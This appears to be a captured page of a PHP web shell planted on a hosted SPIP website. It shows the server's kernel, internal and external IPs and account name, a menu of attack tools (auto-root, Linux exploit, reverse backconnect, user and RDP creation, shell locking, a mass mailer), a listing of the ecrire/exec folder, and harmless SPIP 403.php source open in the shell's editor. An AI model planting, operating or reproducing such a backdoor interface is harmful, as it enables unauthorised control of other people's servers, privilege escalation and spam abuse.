Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
ecrire /
exec /
[ HOME SHELL ]
Name
Size
Permission
Action
403.php
1.89
KB
-rw----r--
404.php
1.56
KB
-rw----r--
admin_plugin.php
9.12
KB
-rw----r--
base_delete_all.php
1.69
KB
-rw----r--
base_repair.php
1.61
KB
-rw----r--
demande_mise_a_jour.php
2.34
KB
-rw----r--
fond.php
2.37
KB
-rw----r--
index.php
2
B
-rw----r--
info_plugin.php
1.06
KB
-rw----r--
informer.php
1.36
KB
-rw----r--
install.php
1.93
KB
-rw----r--
plonger.php
1.39
KB
-rw----r--
puce_statut.php
2.19
KB
-rw----r--
rechercher.php
4.7
KB
-rw----r--
selectionner.php
1.36
KB
-rw----r--
upgrade.php
3.06
KB
-rw----r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 403.php
<?php /***************************************************************************\ * SPIP, Système de publication pour l'internet * * * * Copyright © avec tendresse depuis 2001 * * Arnaud Martin, Antoine Pitrou, Philippe Rivière, Emmanuel Saint-James * * * * Ce programme est un logiciel libre distribué sous licence GNU/GPL. * \***************************************************************************/ /** * Gestion d'affichage d'accès interdit * * @package SPIP\Core\Exec */ if (!defined('_ECRIRE_INC_VERSION')) { return; } /** * Un exec d'acces interdit * * @param string $message */ function exec_403_dist($message = '') { $exec = _request('exec'); $titre = "exec_$exec"; $navigation = ''; $extra = ''; if (!$message) { $message = _T('avis_acces_interdit_prive', ['exec' => _request('exec')]); } $contenu = "<h1 class='grostitre'>" . _T('info_acces_interdit') . '</h1>' . $message; if (_request('var_zajax')) { include_spip('inc/actions'); ajax_retour($contenu); } else { include_spip('inc/presentation'); // alleger les inclusions avec un inc/presentation_mini $commencer_page = charger_fonction('commencer_page', 'inc'); echo $commencer_page($titre); echo debut_gauche(); echo recuperer_fond('prive/squelettes/navigation/dist', []); echo pipeline('affiche_gauche', ['args' => ['exec' => '403', 'exec_erreur' => $exec], 'data' => '']); echo creer_colonne_droite(); echo pipeline('affiche_droite', ['args' => ['exec' => '403', 'exec_erreur' => $exec], 'data' => '']); echo debut_droite(); echo pipeline( 'affiche_milieu', ['args' => ['exec' => '403', 'exec_erreur' => $exec], 'data' => $contenu] ); echo fin_gauche(), fin_page(); } }
Close